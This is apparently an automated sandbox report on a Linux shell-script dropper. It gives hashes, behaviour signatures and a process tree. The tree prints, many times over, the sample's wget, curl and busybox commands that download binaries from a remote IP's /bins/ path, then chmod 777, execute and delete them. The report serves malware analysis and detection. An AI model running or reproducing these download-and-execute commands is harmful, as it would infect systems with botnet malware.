Analysis
-
max time kernel
18s -
max time network
19s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
-
Size
10KB
-
MD5
eeab4766daa60dbedfe5ac8ed6379d9b
-
SHA1
9bc333ca6165533554a6ae360550dd5b28050e51
-
SHA256
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad
-
SHA512
9e67b335a4b29e5381bbba0e4b024f17164814614713df6763b598063707277000f155eb47bcdd5ce7c785eaf790fffe084134540be358aa1bea4ce7fadc518c
-
SSDEEP
192:N5pZuLnRjPMfpMnOWrt609vuOZKu6j6MOWrt609uOZKuiJpZuLnIbjPMF:NkjPMfpMnOWrw09vuOZKu6j6MOWrw09z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 825 chmod 698 chmod 805 chmod 819 chmod 752 chmod 787 chmod 793 chmod 799 chmod 812 chmod 733 chmod 781 chmod 773 chmod 670 chmod 723 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 671 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 699 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ 724 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR 734 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD 753 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr 774 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD 782 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a 788 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP 794 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY 800 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT 806 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel 813 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 820 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu 826 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 curl File opened for modification /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR curl File opened for modification /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 curl File opened for modification /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu curl File opened for modification /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 curl File opened for modification /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ curl File opened for modification /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD curl File opened for modification /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr curl File opened for modification /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD curl File opened for modification /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a curl File opened for modification /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY curl File opened for modification /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT curl File opened for modification /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel curl File opened for modification /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP curl
Processes
-
/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh1⤵PID:637
-
/bin/rm/bin/rm bins.sh2⤵PID:639
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:659
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:667
-
-
/bin/chmodchmod 777 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- File and Directory Permissions Modification
PID:670
-
-
/tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75./asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Executes dropped EXE
PID:671
-
-
/bin/rmrm asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:672
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:673
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:674
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:694
-
-
/bin/chmodchmod 777 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2./6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:701
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:702
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:709
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:719
-
-
/bin/chmodchmod 777 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ./c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Executes dropped EXE
PID:724
-
-
/bin/rmrm c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:725
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:727
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:732
-
-
/bin/chmodchmod 777 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR./dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:748
-
-
/bin/chmodchmod 777 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD./CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:768
-
-
/bin/chmodchmod 777 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr./Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:780
-
-
/bin/chmodchmod 777 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD./FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:786
-
-
/bin/chmodchmod 777 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a./lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:792
-
-
/bin/chmodchmod 777 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP./C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:798
-
-
/bin/chmodchmod 777 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY./HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:804
-
-
/bin/chmodchmod 777 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT./Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:810
-
-
/bin/chmodchmod 777 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel./MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:818
-
-
/bin/chmodchmod 777 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1./37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:824
-
-
/bin/chmodchmod 777 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu./opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:828
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97